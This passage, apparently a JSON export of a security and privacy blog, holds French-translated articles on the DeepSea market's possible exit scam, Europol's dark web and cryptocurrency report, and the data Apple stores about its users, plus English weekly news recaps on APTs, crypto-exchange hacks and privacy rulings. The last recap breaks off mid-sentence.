mais bien sûr il y en a beaucoup d\u0026rsquo;autres :\nLes forces de l\u0026rsquo;ordre ont fermé les serveurs et/ou arrêté l\u0026rsquo;administrateur. Si l\u0026rsquo;administrateur était en ligne tous les jours à la même heure, il est possible que la police ait tenté de l\u0026rsquo;arrêter alors qu\u0026rsquo;il était connecté au marché et aux serveurs. L\u0026rsquo;administrateur a eu un accident. Mais si nous faisons confiance à l\u0026rsquo;information selon laquelle l\u0026rsquo;administrateur et les serveurs se sont déconnectés en même temps, cela ne semble pas probable (à moins qu\u0026rsquo;il n\u0026rsquo;hébergeait certains services chez lui, et que sa maison ait brûlé ou quelque chose du genre - cela ne semble pas très plausible). L\u0026rsquo;administrateur a réalisé un exit scam, mais a décidé d\u0026rsquo;être gentil avec quelques personnes, ou d\u0026rsquo;effectuer quelques retraits pour faire croire que ce n\u0026rsquo;était pas un exit scam, et se donner quelques jours pour déplacer les fonds avec moins de surveillance. Il pourrait aussi s\u0026rsquo;agir d\u0026rsquo;un traitement automatique en cours (Atlantic a dit que tout était traité manuellement, mais sans accès aux serveurs il ne peut pas en être sûr). L\u0026rsquo;administrateur est parti en vacances et a fait une erreur en éteignant son ordinateur. Notez que dans l\u0026rsquo;un des commentaires, Atlantic affirme que le serveur est en marche, mais ne se connecte pas au marché. Ce n\u0026rsquo;est pas impossible, car la page d\u0026rsquo;index (sp4jpokprfuaznn6.onion) est toujours en ligne au moment de la rédaction de cet article (bien que tous les miroirs soient effectivement hors ligne). Fait intéressant, nous pouvons remarquer qu\u0026rsquo;ils ont également un miroir de cette liste sur le clear-net (dsmarket.support). La page a un canari de transparence, qui a été mis à jour le 4 de ce mois, et est censé être mis à jour à nouveau dans les 14 jours.\nLe serveur est en marche En regardant le staff du sous-forum Dread, nous pouvons observer que seul Atlantic a été en ligne depuis l\u0026rsquo;arrêt du service. Quant aux autres membres du staff :\nLe dernier message de WhiteShark (Admin) date du 8 octobre à 04:51 Le dernier message de Greyshark (Head of Operations) date du 2 septembre à 14:10 Le dernier message de Melancocetus (Senior Mod) date du 20 septembre à 13:07 Le dernier message de SeaStarDS (Junior Mod) date du 7 octobre à 16:46 Cela ne signifie cependant pas grand-chose, car tous (sauf WhiteShark) n\u0026rsquo;étaient pas vraiment actifs sur Dread. Pour l\u0026rsquo;administrateur, l\u0026rsquo;absence de messages récents aurait du sens, car des attaques DDoS étaient en cours au moment de son dernier message, il était donc probablement occupé.\nNous en saurons peut-être plus sur ce qui s\u0026rsquo;est passé avec le temps, mais en attendant, notez que je n\u0026rsquo;ai vu aucun commentaire de personnes disant que leurs fonds avaient été déplacés.\n","date":"2020-10-14","externalUrl":null,"permalink":"/fr/posts/2020/deepsea-market-possibly-exit-scammed-continuing-the-recent-streak-of-admins-disappearance/","section":"Articles","summary":"Avertissement : Cet article a été traduit de l’anglais par un LLM. La précision n’est pas garantie. Vous pouvez lire l’article original en anglais.\nLes fermetures de marchés par disparition des administrateurs semblent devenir une tendance ces derniers temps. D’abord avec Empire Market fin août, puis Icarus Market en septembre, et maintenant Deep Sea Market, qui a été déclaré probablement définitivement fermé le 14 octobre par l’un de ses modérateurs. Cette fois encore, il y a eu de l’activité sur le sous-forum officiel du marché, alors déroulons les informations dont nous disposons à ce stade. Notez que les heures mentionnées dans cet article seront en GMT sauf indication contraire.\n","title":"DeepSea Market a possiblement réalisé un exit scam, poursuivant la série récente de disparitions d'administrateurs","type":"posts"},{"content":"Happy Friday! This week again, keep yourself on top of the latest news on APT, Darket, Cryptocurrencies, General Security and Privacy by reading our weekly news recap in less than 1,000 words.\nThis week, some APT activity and DoJ announcements related to Iran, KuCoin is back in business after its hack last month, and Apple had a pretty bad week multiple critical vulnerabilities, including in its latest T2 chip were found. Finally, H\u0026amp;M was fined 35.3 million Euro for data protection violation, and some France, Belgium, and UK spying laws were judged unlawful by the European Court of Justice.\nAPT # Microsoft: Iranian hackers actively exploiting Windows Zerologon flaw\nMicrosoft warned that the CVE-2020-1472 (ZeroLogon) discovered in August this year, and having a critical severity (10/10) is being actively used by the Iran-related APT MuddyWater since at least two weeks ago. ZeroLogon allows attackers to elevate privileges to domain administrator.\nUnited States Seizes Domain Names Used by Iran\u0026rsquo;s Islamic Revolutionary Guard Corps\nThe US Department of Justice announced the seizure of 92 domain names that were used by Iran\u0026rsquo;s Islamic Revolutionary Guard Corps to engage in a global disinformation campaign. The investigation was initiated by intelligence law enforcement received from Google. The investigation was carried on by the FBI, with the help of Google, Facebook, and Twitter.\nCryptocurrencies and Darknet # Kucoin CEO Says Exchange Hack Suspects \u0026lsquo;Found,\u0026rsquo; $204 Million Recovered\nWhen KuCoin got hacked at the end of September, the value of stolen coins was believed to be over USD 150 million. It seems that this number was underestimated. On October 3, the CEO twitted that the company managed to recover the equivalent of USD 204 million. \u0026ldquo;Substantial proof\u0026rdquo; pointing to some suspects have allegedly been found, and the police is involved.\nOn October 7, the company restarted accepting BTC, ETC, and USDT deposits and withdrawals, after they achieved some \u0026ldquo;wallet security strategy upgrade\u0026rdquo;.\nEuropol\u0026rsquo;s Internet Organized Crime Assessment - Dark Web and Crypto Currencies\nEuropol published its new report with the trends when it comes from cybercrime. It mentions that cryptocurrencies are still playing an essential role as a payment facilitator in cybercrime. CoinJoin mixers usage is also rising and is causing difficulties for law enforcement agencies. They also mentioned that it is hard for them to disrupt the darkweb, as it is challenging to anticipate its various developments.\nThe price of stolen remote login passwords is dropping. That\u0026rsquo;s a bad sign\nResearchers at Armor, a security firm, found that the average price for RDP credentials dropped from over $20 in 2019, to between $16 and $25 by analyzing 15 different markets and forums. This might be a bad sign, as it could signal an increase of accesses for sale due to poor security practices by companies (and potentially more breaches).\nGeneral Security # Hackers claim they can now jailbreak Apple\u0026rsquo;s T2 security chip\nSecurity research claims to be able to jailbreak Apple computers by combining two exploits used to jailbreak iPhones. All the devices shipping T2 security chips (sold since 2018) are affected, and the issue is not patchable. This exploit is possible thanks to a debugging interface on the chip left open by Apple, but the jailbreak requires physical access to be exploited.\nWe Hacked Apple for 3 Months: Here\u0026rsquo;s What We Found\nThis week is not so good for Apple. In addition to the alleged problem with the T2 chips, a group of five security researchers found a consequent amount of flaws. The team has been searching for vulnerabilities within Apple\u0026rsquo;s systems for three months, starting July 6th, and found 55 of them: eleven critical, twenty-nine highly severe, thirteen mediumly severe, and two lowly severe. So far, Apple awarded USD 288,500 for these discoveries.\nGoogle Prepares Security Team to Investigate Third-Party Apps\nGoogle is reportedly preparing a new security initiative whee they would investigate sensitive applications through the Google Play Store. As of now, Google already analyses applications on its store, but numbers of malware applications are still regularly found.\nThe United Nations\u0026rsquo; International Marine Organization was Hacked\nThe IMO announced that web services became unavailable on September 30 following a hack, and were restored on October 2 after being shut down to prevent further damages. Who attacked the organization, how, and what they had access to is not disclosed, but the agency says it was a \u0026ldquo;sophisticated cyber-attack\u0026rdquo;, and claims that other systems such as the emails were not impacted.\nPrivacy # 35.3 Million Euro Fine for Data Protection Violations in H\u0026amp;M\u0026rsquo;s Service Center\nThe Hamburg Commissioner for Data Protection and Freedom of Information issued a 35,258,707 EUR fine. Since 2014, the company has been recording extensive details about its employees\u0026rsquo; private lives. Records included things like concrete vacation experiences, symptoms of illness and diagnoses, family issues, and religious beliefs. The total weight of this database was 60 Go.\nUK, French, Belgian blanket spying systems ruled illegal by Europe\u0026rsquo;s top court\nThe European Court of Justice announced earlier this week that the laws allowing French, UK, and Belgian governments to demand traffic data from ISPs and mobile providers break EU privacy laws when it is done indiscriminately. The CJEU however added that the Member States may derogate to their obligation to ensure confidentiality of electronic communications for a limited period in time if Member State are facing a \u0026ldquo;serious threat to national security that proves to be genuine and present or foreseeable\u0026rdquo;.\n","date":"2020-10-09","externalUrl":null,"permalink":"/blog/weekly-news-recap-4/","section":"News","summary":"Happy Friday! This week again, keep yourself on top of the latest news on APT, Darket, Cryptocurrencies, General Security and Privacy by reading our weekly news recap in less than 1,000 words.\n","title":"Weekly News Recap 4","type":"news"},{"content":"Avertissement : Cet article a été traduit de l\u0026rsquo;anglais par un LLM. La précision n\u0026rsquo;est pas garantie. Vous pouvez lire l\u0026rsquo;article original en anglais.\nComme chaque année, Europol a publié ses rapports d\u0026rsquo;évaluation de la criminalité organisée, qui exposent les nouvelles tendances en matière de cybercriminalité et les défis émergents auxquels les forces de l\u0026rsquo;ordre sont confrontées.\nLe rapport est divisé en cinq parties et mentionne les facilitateurs de cybercriminalité et les défis pour les forces de l\u0026rsquo;ordre, les crimes cyber-dépendants, l\u0026rsquo;exploitation sexuelle des enfants, la fraude aux paiements et, enfin, l\u0026rsquo;utilisation du dark web à des fins criminelles. Le document est une bonne lecture mais est assez long (64 pages). Dans cet article, nous nous concentrerons sur le résumé des conclusions d\u0026rsquo;Europol relatives au dark web et aux cryptomonnaies.\nCryptomonnaies # Le rapport souligne que l\u0026rsquo;abus des cryptomonnaies continue de jouer un rôle essentiel en tant que facilitateur de paiement dans tous les domaines de la cybercriminalité. Il met en avant le fait que les transactions en cryptomonnaies sont fiables, irréversibles et offrent un certain degré d\u0026rsquo;anonymat.\nAucun chiffre précis concernant les valeurs ou le nombre de transactions n\u0026rsquo;est communiqué. Cependant, il est dit qu\u0026rsquo;aux alentours de 2011, environ 20 % des transactions (compte tenu de la période, probablement 20 % des transactions Bitcoin) étaient directement liées à la cybercriminalité, mais aujourd\u0026rsquo;hui ce chiffre n\u0026rsquo;est plus que de 1,1 %.\nLe rapport souligne également que les cryptomonnaies sont des moyens de choix pour les activités d\u0026rsquo;extorsion et d\u0026rsquo;arnaque. Bien que les arnaques aux ICO et les schémas de Ponzi représentent la majeure partie du volume, la plupart des crimes signalés aux forces de l\u0026rsquo;ordre concernent l\u0026rsquo;extorsion. Cependant, le grand public ne semble pas tomber aussi facilement dans les emails de sextorsion. Une étude a analysé 4 millions d\u0026rsquo;emails de sextorsion, trouvé 12 500 adresses Bitcoin, et observé que 245 d\u0026rsquo;entre elles avaient reçu un paiement.\nLe nombre de vols est également en hausse, avec dix piratages confirmés de plateformes d\u0026rsquo;échange de cryptomonnaies en 2019, pour un total de 240 millions d\u0026rsquo;euros. La valeur totale est cependant inférieure de 510 millions d\u0026rsquo;euros par rapport à l\u0026rsquo;année précédente.\nLe nombre de distributeurs automatiques de cryptomonnaies est signalé comme étant en croissance et a dépassé les 9 000 cette année. Bien que les distributeurs soient souvent vus comme un excellent moyen d\u0026rsquo;acheter/vendre des cryptomonnaies sans laisser de traces, les opérateurs sont de plus en plus vigilants, notamment en exigeant l\u0026rsquo;identification des clients.\nEnfin, comme les enquêtes sur les cryptomonnaies sont en hausse, Europol s\u0026rsquo;est associé à Centric pour lancer Cryptopol en octobre 2019. Ce jeu vise à former les agents des forces de l\u0026rsquo;ordre aux techniques d\u0026rsquo;investigation.\nMarchés du darknet # Le rapport met en évidence un haut niveau de volatilité sur le dark web en 2019 et début 2020, suivi de mesures de protection mises en place par les différentes places de marché. Le dark web s\u0026rsquo;avère difficile à perturber pour les forces de l\u0026rsquo;ordre car il est compliqué pour elles d\u0026rsquo;anticiper ses divers développements.\nLa diminution des places de marché à grande échelle a conduit à une augmentation des plus petites, parfois limitées à des besoins spécifiques des utilisateurs (par exemple, ne vendant que du cannabis).\nLe rapport note que comme les utilisateurs ont tendance à continuer d\u0026rsquo;utiliser des marchés stables et des vendeurs bien classés, des sites comme DarkNet Trust (un site vérifiant la réputation des vendeurs en recherchant les noms d\u0026rsquo;utilisateur et les clés PGP - environ 10 000 vendeurs répertoriés) sont devenus plus populaires.\nLa centralisation de l\u0026rsquo;information sur les marchés du darknet se serait stabilisée après la fermeture de DeepDotWeb en 2017. Les utilisateurs essaient désormais de rendre la navigation sur le darknet plus conviviale, et des sites comme dark.fail et darknetlive.com ont pris la relève de DeepDotWeb comme centres d\u0026rsquo;information. Dread, un forum actif depuis environ trois ans, est également très populaire.\nEn ce qui concerne la navigation, des alternatives à Grams ont émergé : les utilisateurs peuvent désormais utiliser Kilos (depuis novembre 2019) et Recon (lancé par Dread). Grams était le plus grand moteur de recherche du dark web lorsqu\u0026rsquo;il a fermé en 2017. Il était opéré par la même équipe que le mixeur Helix, le service de blanchiment de Bitcoin le plus important à l\u0026rsquo;époque.\nEuropol a également remarqué deux tendances récentes rendant les enquêtes difficiles. Premièrement, les marchés essaient d\u0026rsquo;améliorer leur sécurité opérationnelle, notamment en passant à des systèmes sans compte utilisateur et sans portefeuille. Deuxièmement, certains marchés ont des cycles de vie courts (en raison de fermetures décidées par le staff). Europol estime que c\u0026rsquo;est dû au fait que les administrateurs veulent rester sous le radar.\nUne autre tendance est la collaboration entre les différents acteurs pour maintenir l\u0026rsquo;écosystème sûr. Par exemple, tous les marchés peuvent utiliser gratuitement Endgame (le mécanisme de protection DDoS de Dread). Un autre exemple, que nous avons appris récemment via un message sur Dread, est que les acteurs de différents marchés auraient un sous-forum privé sur Dread, et auraient également coordonné des donations au projet Tor en 2019.\nLes acteurs du darknet veulent plus de sécurité, ce qui se traduit par exemple par l\u0026rsquo;application de politiques interdisant JavaScript, le passage aux séquestres multisignatures BTC (qui reste la monnaie numéro un), et l\u0026rsquo;utilisation d\u0026rsquo;autres cryptomonnaies (Monero, Litecoin, \u0026hellip;). Monero devient la cryptomonnaie de confidentialité la plus reconnue, suivie de Zcash et Dash. Europol souligne que ces cryptomonnaies constituent des obstacles considérables pour les forces de l\u0026rsquo;ordre. Les services CoinJoin (tels que les portefeuilles Wasabi et Samourai) deviennent également populaires, et Europol les considère comme une menace majeure.\nBien que Tor reste l\u0026rsquo;option la plus populaire, des alternatives décentralisées comme OpenBazaar et Particl.io commencent à émerger.\nQuant aux contenus échangés, il semble que les services numériques (tels que l\u0026rsquo;accès RDP à des systèmes compromis), ainsi que les rançongiciels et les faux documents, deviennent plus populaires. Les documents frauduleux sont souvent utilisés pour commettre des fraudes financières ou des demandes de citoyenneté. Les faux passeports semblent être de meilleure qualité qu\u0026rsquo;auparavant et peuvent passer plusieurs tests d\u0026rsquo;authentification. Il est également dit que certains sites font la promotion de guides sur la façon d\u0026rsquo;utiliser les cryptomonnaies pour le blanchiment d\u0026rsquo;argent, mais d\u0026rsquo;après mon expérience, cela existe depuis longtemps. Les drogues les plus dangereuses comme le fentanyl seraient encore significativement présentes, mais le nombre d\u0026rsquo;annonces aurait diminué. Europol a également remarqué que davantage de groupes du crime organisé vendent de la drogue sur le dark web comme effort pour élargir leur mécanisme de distribution.\nEuropol mentionne également quelques succès concernant les achats d\u0026rsquo;armes à feu, car il est devenu plus difficile d\u0026rsquo;en acheter sur le dark web après la fermeture du marché Berlusconi par les autorités italiennes fin 2019.\nEnfin, l\u0026rsquo;agence mentionne qu\u0026rsquo;Hydra prévoit de développer une communauté anglophone et que cela rendrait les enquêtes des forces de l\u0026rsquo;ordre plus difficiles et constituerait une menace significative pour l\u0026rsquo;UE. Pour plus de contexte, le service qu\u0026rsquo;Hydra prévoit de lancer s\u0026rsquo;appelle Eternos et devrait être lancé ce mois-ci (il devait être lancé plus tôt cette année mais a été retardé).\n","date":"2020-10-07","externalUrl":null,"permalink":"/fr/posts/2020/europols-internet-organized-crime-assessment-darkweb-and-crypto-currrencies/","section":"Articles","summary":"Avertissement : Cet article a été traduit de l’anglais par un LLM. La précision n’est pas garantie. Vous pouvez lire l’article original en anglais.\nComme chaque année, Europol a publié ses rapports d’évaluation de la criminalité organisée, qui exposent les nouvelles tendances en matière de cybercriminalité et les défis émergents auxquels les forces de l’ordre sont confrontées.\n","title":"Évaluation de la criminalité organisée sur Internet par Europol - Dark Web et cryptomonnaies","type":"posts"},{"content":"Avertissement : Cet article a été traduit de l\u0026rsquo;anglais par un LLM. La précision n\u0026rsquo;est pas garantie. Vous pouvez lire l\u0026rsquo;article original en anglais.\nSi vous utilisez un iPhone, un Mac ou un iPad, il y a de fortes chances que vous soyez connecté à un identifiant Apple, et que vous permettiez donc à Apple de collecter une bonne quantité d\u0026rsquo;informations personnelles sur vous. Dans cet article, nous verrons ce qu\u0026rsquo;Apple stocke à votre sujet, et dans un futur article, quelles mesures vous pouvez prendre pour éviter cela autant que possible.\nCet article est basé sur l\u0026rsquo;archive qu\u0026rsquo;Apple vous fournit lorsque vous leur demandez une copie de vos données (ce que vous pouvez faire ici). Une fois connecté à cette page, soumettez la demande, et vous devrez attendre quelques jours avant de pouvoir tout télécharger en ligne.\nLorsque les données sont prêtes, vous recevrez un email et pourrez tout télécharger à partir d\u0026rsquo;une liste, comme montré dans la capture suivante. Au moins une des lignes indiquait « no data » à télécharger (tandis que les autres lignes indiquaient le poids de l\u0026rsquo;archive téléchargeable).\nPage de téléchargement de l\u0026rsquo;archive personnelle Apple Parcourons les différents fichiers et voyons quelles choses intéressantes nous pouvons trouver. Notez que je ne mentionnerai pas les choses évidentes (par exemple, si vous utilisez Apple Calendar, vous pourrez télécharger des fichiers de calendrier ; si vous sauvegardez vos conversations WhatsApp, Apple les aura non chiffrées sur iCloud également), ni les choses que je ne pense pas intéressantes à mentionner, et que cette analyse est basée sur mon archive, donc certaines personnes pourraient avoir des données que je n\u0026rsquo;ai pas si elles utilisent des services ou des fonctionnalités que je n\u0026rsquo;utilise pas. Notez également qu\u0026rsquo;il semble qu\u0026rsquo;Apple conserve certaines informations pendant très longtemps (quelques années à indéfiniment), d\u0026rsquo;après ce que j\u0026rsquo;ai pu voir dans mes fichiers.\nInformations sur les services médias Apple # Apple Music # Premièrement, il y a une grande quantité de données liées à votre activité d\u0026rsquo;écoute si vous utilisez Apple Music. Sans surprise, Apple stocke les titres, artistes et genres que vous avez aimés et que vous n\u0026rsquo;avez pas aimés. Ce qui est plus surprenant, c\u0026rsquo;est les informations qu\u0026rsquo;ils conservent sur les titres que vous avez écoutés : pratiquement tout. Dans mon cas, j\u0026rsquo;ai testé le service il y a des années, et l\u0026rsquo;historique est toujours là, contenant (pour chaque écoute enregistrée) :\nLe nom de l\u0026rsquo;artiste et du morceau, ainsi que le genre musical Un identifiant unique de l\u0026rsquo;appareil que vous avez utilisé pour écouter le morceau, ainsi que son adresse IP La version build d\u0026rsquo;Apple Music, et la marque, le modèle et la version de l\u0026rsquo;OS de l\u0026rsquo;appareil utilisé La position en millisecondes de l\u0026rsquo;endroit où vous avez commencé/arrêté le morceau que vous écoutiez, et la raison (par exemple, passage au morceau suivant) L\u0026rsquo;heure à laquelle vous avez commencé et arrêté l\u0026rsquo;écoute Si vous écoutiez hors ligne C\u0026rsquo;est déjà inquiétant, mais nous pouvons observer dans l\u0026rsquo;échantillon obtenu d\u0026rsquo;Apple que certaines lignes n\u0026rsquo;ont pas d\u0026rsquo;informations sur le morceau (nom, genre, artiste, \u0026hellip;), donc je suppose qu\u0026rsquo;Apple enregistrerait tout de même toutes ces informations si vous écoutez quelque chose de local sur votre appareil qui n\u0026rsquo;est pas dans le store.\nActivité des stores # Applications # Comme tout commerçant, Apple conservera un historique de tout ce que vous faites dans ses magasins. Ils garderont toutes les informations de facturation que vous avez eues avec eux (vu l\u0026rsquo;ancienneté de celles de mon échantillon, je m\u0026rsquo;attends à ce qu\u0026rsquo;ils les conservent indéfiniment). Cela inclut :\nL\u0026rsquo;adresse email et le numéro de téléphone Le nom et l\u0026rsquo;adresse de facturation Le type de paiement L\u0026rsquo;adresse IP (probablement au moment du changement) Les détails de l\u0026rsquo;appareil (modèle du téléphone et version de l\u0026rsquo;OS) Si vous vous êtes inscrit en tant qu\u0026rsquo;étudiant (pour obtenir des réductions comme avec Apple Music) Chaque fois que vous autorisez une machine à utiliser vos informations de facturation (c\u0026rsquo;est-à-dire que vous avez acheté quelque chose ou vous êtes connecté au store), ils garderont le nom de l\u0026rsquo;appareil et un identifiant unique de l\u0026rsquo;appareil. Si vous utilisez iTunes, ils garderont également la chaîne user agent. Ils conserveront toutes ces informations si vous autorisez les notifications push (et le numéro de série de l\u0026rsquo;appareil si c\u0026rsquo;est un produit Apple) également.\nChaque fois que vous installez une application, ils garderont le nom de l\u0026rsquo;élément, l\u0026rsquo;horodatage, le fournisseur de l\u0026rsquo;application, les identifiants uniques et les détails de l\u0026rsquo;appareil (application utilisée, modèle et version de l\u0026rsquo;OS de l\u0026rsquo;appareil), et l\u0026rsquo;adresse IP. Ils conserveront également ces informations (ainsi que la version de l\u0026rsquo;application) à chaque mise à jour. De même, ils garderont des informations sur le moment où vous avez téléchargé des morceaux pour une écoute hors ligne.\nSi vous achetez un abonnement, ils garderont les mêmes informations, ainsi que la dernière fois que vous avez activé ou désactivé le renouvellement automatique. Et bien sûr, pour chaque paiement, ils le lieront à un identifiant de facturation spécifique et conserveront le prix.\nAutres activités # Continuons avec les choses inquiétantes en examinant ce répertoire. Il y a deux fichiers : « Apps And Service Analytics.csv » qui pèse 60 Mo dans mon cas, et « App Store Click Activity.csv » qui pèse 11 Mo (il y a la même chose pour le BookStore) qui sont pires que les autres.\nCe que ces fichiers font est quelque peu obscur, et ils sont difficiles à analyser (environ une centaine de colonnes), mais il semble qu\u0026rsquo;Apple stocke toute votre activité en relation avec les applications Stores et Music (et je suppose Apple Watch aussi), comme où vous avez cliqué, ce que vous avez vu, etc. Ces fichiers stockent ce que vous avez cherché dans le store, l\u0026rsquo;action que vous avez entreprise, votre IP, le matériel que vous avez utilisé (et sa version d\u0026rsquo;OS), la ou les langues que votre système utilise, et un identifiant unique d\u0026rsquo;appareil.\nDe plus, si vous avez déjà utilisé TestFlight (une application pour permettre aux développeurs d\u0026rsquo;avoir une bêta restreinte), il semble qu\u0026rsquo;Apple stockera toutes les informations relatives aux crashs et aux sessions. Je ne l\u0026rsquo;ai jamais utilisé, donc je n\u0026rsquo;ai pas de données à comparer et ne peux donc pas savoir à quel point c\u0026rsquo;est grave concernant le niveau d\u0026rsquo;informations partagées.\nIdentifiant Apple et informations de compte # Apple stockera quand vous avez ajouté un appareil à votre compte, son numéro de série, l\u0026rsquo;horodatage et l\u0026rsquo;IP d\u0026rsquo;origine du dernier heartbeat, son numéro de série et, le cas échéant, le code IMEI.\nApple suivra également si vous téléchargez les données de votre archive (spécifiquement quelle partie et quand).\nActivité Apple Pay # Ici, Apple stockera des informations sur les cartes que vous avez ajoutées à Apple Pay, le numéro de série de l\u0026rsquo;appareil, l\u0026rsquo;heure, comment la carte a été saisie (par exemple manuellement ou via l\u0026rsquo;API), les derniers chiffres de la carte, son type, le réseau de la carte. Étonnamment, il ne semble pas que des adresses IP soient stockées.\nIl y a un fichier contenant les « Apple Pay In App Purchases », mais étonnamment je n\u0026rsquo;avais qu\u0026rsquo;une seule ligne, ce qui pourrait signifier que lorsque vous utilisez Apple Pay, ils ne stockent ces informations que pendant une période relativement courte.\nAutres données # Dernière partie de l\u0026rsquo;export que cet article couvrira, le répertoire « other data », qui stocke quelques informations intéressantes.\nIl y a plusieurs parties de divers logiciels. L\u0026rsquo;une d\u0026rsquo;elles concerne les appareils enregistrés avec la messagerie Apple (avec tous les détails habituels comme le nom de l\u0026rsquo;appareil, la version de l\u0026rsquo;OS, \u0026hellip;), ainsi que les identifiants que les gens peuvent utiliser pour vous contacter. Jusque-là, rien de trop surprenant.\nIl y a un fichier pour votre utilisation d\u0026rsquo;iCloud. Il stockera quand vous avez téléversé ou supprimé des photos de/vers Apple Photo, ainsi que la date (mais pas l\u0026rsquo;heure), le type d\u0026rsquo;appareil (mais rien d\u0026rsquo;aussi intrusif qu\u0026rsquo;avant - pas d\u0026rsquo;identifiant unique etc.), la ville IP (mais pas l\u0026rsquo;IP), et la taille (en px) des photos, ainsi que leur poids (et le cas échéant, la durée de la vidéo). Le même type d\u0026rsquo;informations sera stocké lors de l\u0026rsquo;édition de fichiers dans le Cloud Drive, de la connexion réussie à un nouveau WiFi, ou de l\u0026rsquo;« ajout d\u0026rsquo;une entrée d\u0026rsquo;appel dans la liste récente de l\u0026rsquo;application Téléphone/FaceTime ». Étonnamment, il semble que cet historique ne soit conservé que quelques mois au maximum.\nIl y a également un fichier JSON contenant tous vos réseaux WiFi connus. Pour chaque entrée, il inclut le nom du réseau, la date d\u0026rsquo;ajout et une adresse MAC (peut-être celle du point d\u0026rsquo;accès). Les mots de passe ne semblent pas y être stockés.\nDernier point mais non des moindres, pour chaque email que vous envoyez avec le client mail intégré, Apple conservera les adresses d\u0026rsquo;expéditeur et de destinataire, ainsi que les noms des destinataires et de l\u0026rsquo;expéditeur, même si vous n\u0026rsquo;utilisez pas une adresse email iCloud ! Il semble cependant qu\u0026rsquo;ils ne conservent qu\u0026rsquo;un historique limité à un certain nombre d\u0026rsquo;entrées.\nPour conclure cet article, nous avons observé qu\u0026rsquo;Apple stocke une quantité d\u0026rsquo;informations inutiles et privées vous concernant. Pour n\u0026rsquo;en mentionner que quelques-unes : les personnes avec qui vous échangez des emails, vos adresses IP au fil des années, et toutes vos actions sur les stores. Le fait qu\u0026rsquo;ils stockent les numéros de série des appareils est également terrible. Cela signifie qu\u0026rsquo;Apple aura un historique de tout appareil connecté à des identifiants Apple pour toujours. Même si vous créez un nouveau compte sur un appareil que vous avez déjà utilisé, l\u0026rsquo;entreprise sera en mesure de trouver des relations entre vos différents comptes. Cela pourrait cependant être bien pire. Par exemple, Apple ne stocke pas (du moins dans l\u0026rsquo;archive) certaines informations sur l\u0026rsquo;utilisation de vos applications (par exemple, quand vous ouvrez une application, combien de temps vous l\u0026rsquo;utilisez, \u0026hellip;).\nD\u0026rsquo;après cet article, nous pouvons savoir qu\u0026rsquo;Apple stocke au moins les informations que nous avons mentionnées, mais il n\u0026rsquo;y a aucune garantie qu\u0026rsquo;ils ne possèdent que ces informations, et qu\u0026rsquo;ils n\u0026rsquo;en auront pas davantage à l\u0026rsquo;avenir. De plus, en raison de mon utilisation des services Apple, certaines données pourraient ne pas avoir été présentes, et la durée de stockage pourrait parfois être limitée (ou non) à une plage que je n\u0026rsquo;ai pas pu observer en raison de mon activité sur ce compte spécifique.\nDans un prochain article, nous examinerons les mesures potentielles que vous pouvez prendre pour limiter le pistage d\u0026rsquo;Apple.\nMise à jour novembre 2021 : Voir cet article pour apprendre comment améliorer la confidentialité et la sécurité de votre iPhone.\nCrédits :\nImage de couverture par Wesson Wang sur Unsplash ","date":"2020-10-03","externalUrl":null,"permalink":"/fr/posts/2020/what-does-apple-know-about-you/","section":"Articles","summary":"J’étais curieux de savoir quelles données Apple collecte, alors j’ai demandé une archive de mes données. Voyons ce qu’elle contient.","title":"Que sait Apple sur vous ?","type":"posts"},{"content":"Missed the news this week? Then get up to speed with our news recap. Among other things, ESET discovers an APT allegedly active for at least eleven years; a bitcoin exchange owner was convicted for racketeering and laundering, KuCoin lost USD 150 million in a hack. Also, some new arrests related to the darknet, the man that hacked LinkedIn and Dropbox in 2012 was sentenced, ransomware again, and Cloudflare releases a \u0026ldquo;privacy-first\u0026rdquo; analytics tool.\nAPT # ESET discovers a rare APT that stayed undetected for nine years\nESET claimed to have uncovered XDSpy, an APT active since at least 2011 and primarily focused on reconnaissance and documents thefts. The group is said to mainly target government agencies and private companies in Eastern Europe, including Belarus, Russia, Moldavia, Serbia, and Ukraine.\nNorth Korea-linked APT group targeted UN Security Council officials over the past year, states a report from the United Nations organ\nThe UN Security Council attributed a spear-phishing attempt to KimSuky, an APT linked to North Korea. The group targeted 26 UN officials using email and WhatsApp messages posing as UN security alerts, or requests for interviews.\nCryptocurrencies # Owner of Bitcoin Exchange Convicted of Racketeering Conspiracy for Laundering Millions of Dollars in International Cyber Fraud Scheme\nThe owner of RG Coins, a Bulgaria-based BTC exchange was convicted of conspiracy to commit racketeering and money laundering. Along with 19 other defendants, he victimized more than 900 people and exchanged more than USD 4.9 million for four other members of the criminal enterprise between September 2015 and December 2018.\nOver $150M Drained in KuCoin Crypto Exchange Hack\nKuCoin, a Singapore-based cryptocurrency exchange was hacked and lost at least USD 150 million in various currencies, including BTC, ETH, LTC, XPR, and a couple of other. KuCoin\u0026rsquo;s cold wallets were not affected.\nCoinbase is a mission focused company\nCoinbase CEO announced in a blog post that the exchange is a mission-focused company, and would not focus on causes not directly related to their mission (create an open financial system for the world), such as policy decisions, non-profit work, broader societal issues, and political causes.\nDarknet # McKean County Man Charged with Trying to Buy Meth on the Dark Web for Resale\nA man was indicted in Pennsylvania for purchasing at least 50 grams of methamphetamines with the intent to distribute. The indictment isn\u0026rsquo;t rich in details, but we know that the US Postal Inspection Service, the DEA, and McKean County forces were involved.\n“Dark Web Cannibal” Sentenced to 40 Years in Prison\nA Texas man was sentenced to 40 years in prison on child exploitation charges related to a post on an onion service where he said: \u0026ldquo;I\u0026rsquo;d like to try necrophilia and cannibalism, and see how it feels to take a life. If you\u0026rsquo;d be willing to let me kill you, are in the US (preferably in the south), and can travel by car, contact me\u0026rdquo;. Law enforcement posing as the father of a 13 years old child contacted him and exchanged various messages where the culprit repeated interest in raping, killing, and eating the 13-year old child.\nGeneral Security # Russian Hacker Sentenced to Over 7 Years in Prison for Hacking into Three Bay Area Tech Companies\nThe hacker that broke into LinkedIn and Dropbox in 2012 and accessed millions of users\u0026rsquo; data was sentenced to 88 months in prison. He was arrested while travelling to the Czech Republic in October 2016, and extradited to the US in March 2018.\nUS govt warns of sanction risks for facilitating ransomware payments\nThe U.S. Treasury Department\u0026rsquo;s Office of Foreign Assets Control announced that organizations helping ransomware victims to make ransom payments are at risk of violating OFAC regulations, and therefore risk sanctions. The agency also said that potential sanctions could be mitigated if companies hit by ransomware report the incident to law enforcement, and provide assistance.\nTwitter is warning developers that their API keys, access tokens, and access token secrets may have been exposed in a browser\u0026rsquo;s cache\nTwitter sent emails to developers to warn them that their API keys and secret access tokens could have stored in browsers cache while accessing developer.twitter.com.\nNevada school district refuses to submit to ransomware blackmail, hacker publishes student data\nA school in Nevada suffered from a ransomware attack at the end of September and refused to pay the ransom. In retaliation, the hacker shared students\u0026rsquo; personal information, including names, social security 